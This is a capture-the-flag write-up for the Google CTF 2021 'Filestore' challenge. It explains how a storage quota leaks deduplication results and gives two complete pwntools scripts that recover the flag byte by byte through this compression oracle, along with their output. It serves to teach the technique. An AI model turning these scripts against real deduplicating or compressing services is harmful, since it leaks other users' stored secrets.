Google CTF 2021: Filestore

Following description was provided for the task:

We stored our flag on this platform, but forgot to save the id. Can you help us restore it?

The full source code of the challenge was attached to the description:

filestore.py
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
 
import os, secrets, string, time
from flag import flag
 
 
def main():
    # It's a tiny server...
    blob = bytearray(2**16)
    files = {}
    used = 0
 
    # Use deduplication to save space.
    def store(data):
        nonlocal used
        MINIMUM_BLOCK = 16
        MAXIMUM_BLOCK = 1024
        part_list = []
        while data:
            prefix = data[:MINIMUM_BLOCK]
            ind = -1
            bestlen, bestind = 0, -1
            while True:
                ind = blob.find(prefix, ind+1)
                if ind == -1: break
                length = len(os.path.commonprefix([data, bytes(blob[ind:ind+MAXIMUM_BLOCK])]))
                if length > bestlen:
                    bestlen, bestind = length, ind
 
            if bestind != -1:
                part, data = data[:bestlen], data[bestlen:]
                part_list.append((bestind, bestlen))
            else:
                part, data = data[:MINIMUM_BLOCK], data[MINIMUM_BLOCK:]
                blob[used:used+len(part)] = part
                part_list.append((used, len(part)))
                used += len(part)
                assert used <= len(blob)
 
        fid = "".join(secrets.choice(string.ascii_letters+string.digits) for i in range(16))
        files[fid] = part_list
        return fid
 
    def load(fid):
        data = []
        for ind, length in files[fid]:
            data.append(blob[ind:ind+length])
        return b"".join(data)
 
    print("Welcome to our file storage solution.")
 
    # Store the flag as one of the files.
    store(bytes(flag, "utf-8"))
 
    while True:
        print()
        print("Menu:")
        print("- load")
        print("- store")
        print("- status")
        print("- exit")
        choice = input().strip().lower()
        if choice == "load":
            print("Send me the file id...")
            fid = input().strip()
            data = load(fid)
            print(data.decode())
        elif choice == "store":
            print("Send me a line of data...")
            data = input().strip()
            fid = store(bytes(data, "utf-8"))
            print("Stored! Here's your file id:")
            print(fid)
        elif choice == "status":
            print("User: ctfplayer")
            print("Time: %s" % time.asctime())
            kb = used / 1024.0
            kb_all = len(blob) / 1024.0
            print("Quota: %0.3fkB/%0.3fkB" % (kb, kb_all))
            print("Files: %d" % len(files))
        elif choice == "exit":
            break
        else:
            print("Nope.")
            break
 
try:
    main()
except Exception:
    print("Nope.")
time.sleep(1)

Application Analysis

Investigation of the application consists of two parts:

  • A high-level interactive analysis
  • A low-level source code analysis

Interactive Analysis

Command-line tools like nc can be used to connect to the application and interactively explore its functionality from the perspective of a user.

$ nc filestore.2021.ctfcompetition.com 1337

Once the connection is established, the application responds with a text-based menu:

== proof-of-work: disabled ==
Welcome to our file storage solution.

Menu:
- load
- store
- status
- exit

In short, these options provide the following functionality.

store prompts the user for a line of data to be stored. On success, a corresponding file identifier is displayed.

Send me a line of data...
this is a test
Stored! Here's your file id:
jFpyelIHQ8kSm2dc

load asks the user for a file identifier to be displayed.

Send me the file id...
jFpyelIHQ8kSm2dc
this is a test

status displays statistics about the storage.

User: ctfplayer
Time: Thu Jul 30 20:32:58 2021
Quota: 0.040kB/64.000kB
Files: 2

exit terminates the connection.

When connecting to the service, 0.026kB (26 bytes) of the storage are already occupied. Assuming the storage is empty except for the flag and each character of the flag is a single byte in size, it can be concluded that the flag is 26 characters long.

Source Code Analysis

One single array of bytes is used to store the entries. This array is initialized with zeroes before the flag is inserted as first entry.

Next to the plain byte array, the application stores meta information about the submitted entries. When setting up a dummy flag of CTF{######################}, the application keeps track of the entries in the following way:

Text Offset Length
CTF{############ 0 16
##########} 16 11

As shown above, entries are logically split into blocks of size 16.

To save space, a simple compression algorithm tries to avoid storing duplicates by finding common prefixes. Adding another entry with the content ############ extends the meta information as follows:

Text Offset Length
CTF{############ 0 16
##########} 16 11
############ 4 12

The full entry could be found in the existing content, therefore the storage remains unmodified.

Vulnerability and Exploit

A compression oracle attack can be conducted. Users have the possibility to query the currently used storage down to a level of bytes. By guessing characters and observing the used storage after compression, an attacker is able to recover previously stored content.

According to the Google CTF rules, flags conform to the format CTF{some-secret-value-here}. Knowing the initial characters is sufficient to confirm the vulnerability:

$ nc filestore.2021.ctfcompetition.com 1337
== proof-of-work: disabled ==
Welcome to our file storage solution.

Menu:
- load
- store
- status
- exit
status
User: ctfplayer
Time: Wed Jul 30 21:15:38 2021
Quota: 0.026kB/64.000kB
Files: 1

Menu:
- load
- store
- status
- exit
store
Send me a line of data...
CTF{
Stored! Here's your file id:
gStF8LkzLbR9lma4

Menu:
- load
- store
- status
- exit
status
User: ctfplayer
Time: Wed Jul 30 21:15:45 2021
Quota: 0.026kB/64.000kB
Files: 2

Although a new entry was added to the storage, the occupied memory remains unchanged. It can be concluded that the compression implementation found the text provided by the user and avoided the usage of additional memory.

Based on this observation, an exploit guessing the flag characters one by one can be implemented. However, there is a constraint that needs to be considered. After reaching the block size of 16 characters, the next guess is treated as a separate block and could be compressed independently of the previous one. From an attacker point of view it is not possible to distinguish between the compression of the blocks together or separately.

For demonstration purposes the dummy flag CTF{######################} is inserted into the system. Guessing CTF{############C does not increase the used storage, even though the guess is incorrect. As shown in the table below, the final C of the guess inadvertently matches the first character of the flag.

Text Offset Length
CTF{############ 0 16
##########} 16 11
CTF{############ 0 16
C 0 1

One solution to this problem is to guess backwards from the end of the flag. Guesses are prepended instead of appended with this approach and the known terminating } character ensures that the guess unambiguously targets the end of the flag.

exploit_backwards.py
#!/usr/bin/env python3
import re
import string
 
from pwn import *
 
_FLAG_CHARSET: str = string.ascii_letters + string.digits + string.punctuation
_QUOTA_PATTERN: str = r"Quota: (.+?)kB/64\.000kB"
 
 
def _recv_menu(r) -> str:
    return r.recvuntil(b"exit\n").decode("ascii")
 
 
def _parse_quota(quota_response: str) -> float:
    m = re.search(_QUOTA_PATTERN, quota_response, re.MULTILINE)
    return float(m.group(1))
 
 
def _get_quota(r) -> float:
    r.sendline(b"status")
    response = _recv_menu(r)
    return _parse_quota(response)
 
 
def _send_guess(r, guess: str):
    r.sendline(b"store")
    r.sendline(bytes(guess, encoding="ascii"))
    _recv_menu(r)
 
 
def main():
    with remote("filestore.2021.ctfcompetition.com", 1337) as r:
        _recv_menu(r)
 
        quota = _get_quota(r)
        flag_length = int(quota * 1000)
 
        quota = _get_quota(r)
        flag = "}"
        while len(flag) <= flag_length:
            for guessed_character in _FLAG_CHARSET:
                _send_guess(r, guessed_character + flag)
 
                # Check quota change
                new_quota = _get_quota(r)
                if quota == new_quota:
                    # Fully compressed, therefore a valid guess
                    flag = guessed_character + flag
                    print(flag)
                    break
                quota = new_quota
 
        print(f"flag: {flag}")
        print(f"quota: {quota}")
 
 
if __name__ == "__main__":
    main()

Executing the above scripts results in the following output:

$ ./exploit_backwards.py
[+] Opening connection to filestore.2021.ctfcompetition.com on port 1337: Done
n}
0n}
i0n}
ti0n}
4ti0n}
c4ti0n}
ic4ti0n}
1ic4ti0n}
p1ic4ti0n}
up1ic4ti0n}
dup1ic4ti0n}
3dup1ic4ti0n}
d3dup1ic4ti0n}
_d3dup1ic4ti0n}
f_d3dup1ic4ti0n}
0f_d3dup1ic4ti0n}
_0f_d3dup1ic4ti0n}
3_0f_d3dup1ic4ti0n}
M3_0f_d3dup1ic4ti0n}
1M3_0f_d3dup1ic4ti0n}
R1M3_0f_d3dup1ic4ti0n}
CR1M3_0f_d3dup1ic4ti0n}
{CR1M3_0f_d3dup1ic4ti0n}
F{CR1M3_0f_d3dup1ic4ti0n}
TF{CR1M3_0f_d3dup1ic4ti0n}
CTF{CR1M3_0f_d3dup1ic4ti0n}
flag: CTF{CR1M3_0f_d3dup1ic4ti0n}
quota: 12.311
[*] Closed connection to filestore.2021.ctfcompetition.com port 1337

CR1M3 in the flag appears to be a reference to the CRIME exploit :-)

As it is known that the flag has 26 characters and spans 2 blocks, this solution can be improved. By guessing the first block of the flag in forward direction and the second one in backwards direction, storage cost can be saved because the forward guessing allows to compress the already known part of the flag.

exploit_bidirectional.py
#!/usr/bin/env python3
import re
import string
 
from pwn import *
 
_FLAG_CHARSET: str = string.ascii_letters + string.digits + string.punctuation
_BLOCK_SIZE: int = 16
_QUOTA_PATTERN: str = r"Quota: (.+?)kB/64\.000kB"
 
 
def _recv_menu(r) -> str:
    return r.recvuntil(b"exit\n").decode("ascii")
 
 
def _parse_quota(quota_response: str) -> float:
    m = re.search(_QUOTA_PATTERN, quota_response, re.MULTILINE)
    return float(m.group(1))
 
 
def _get_quota(r) -> float:
    r.sendline(b"status")
    response = _recv_menu(r)
    return _parse_quota(response)
 
 
def _send_guess(r, guess: str):
    r.sendline(b"store")
    r.sendline(bytes(guess, encoding="ascii"))
    _recv_menu(r)
 
 
def main():
    with remote("filestore.2021.ctfcompetition.com", 1337) as r:
        _recv_menu(r)
 
        quota = _get_quota(r)
        flag_length = int(quota * 1000)
 
        # Guess forward
        flag_start = "CTF{"
        while len(flag_start) < _BLOCK_SIZE:
            for guessed_character in _FLAG_CHARSET:
                # Guess character and append it to the known flag
                _send_guess(r, flag_start + guessed_character)
 
                # Check quota change
                new_quota = _get_quota(r)
                if quota == new_quota:
                    # Fully compressed, therefore a valid guess
                    flag_start = flag_start + guessed_character
                    print(flag_start)
                    break
                quota = new_quota
 
        # Guess backwards
        quota = _get_quota(r)
        flag_end = "}"
        while len(flag_start + flag_end) <= flag_length:
            for guessed_character in _FLAG_CHARSET:
                # Guess character and prepend it to the known flag
                _send_guess(r, guessed_character + flag_end)
 
                # Check quota change
                new_quota = _get_quota(r)
                if quota == new_quota:
                    # Fully compressed, therefore a valid guess
                    flag_end = guessed_character + flag_end
                    print(flag_end)
                    break
                quota = new_quota
 
        print(f"flag: {flag_start + flag_end}")
        print(f"quota: {quota}")
 
 
if __name__ == "__main__":
    main()

Executing the above scripts results in the following output:

$ ./exploit.py      
[+] Opening connection to filestore.2021.ctfcompetition.com on port 1337: Done
CTF{C
CTF{CR
CTF{CR1
CTF{CR1M
CTF{CR1M3
CTF{CR1M3_
CTF{CR1M3_0
CTF{CR1M3_0f
CTF{CR1M3_0f_
CTF{CR1M3_0f_d
CTF{CR1M3_0f_d3
CTF{CR1M3_0f_d3d
n}
0n}
i0n}
ti0n}
4ti0n}
c4ti0n}
ic4ti0n}
1ic4ti0n}
p1ic4ti0n}
up1ic4ti0n}
flag: CTF{CR1M3_0f_d3dup1ic4ti0n}
quota: 6.578
[*] Closed connection to filestore.2021.ctfcompetition.com port 1337

Official Solution

Comparing the presented approach to the official solution, it can be seen that the flag can be recovered quicker. At least the required storage of 6.578kB of the bidirectional version is significantly less than the 12.682kB of the official solution, although both values are far from the 64kB limit :-)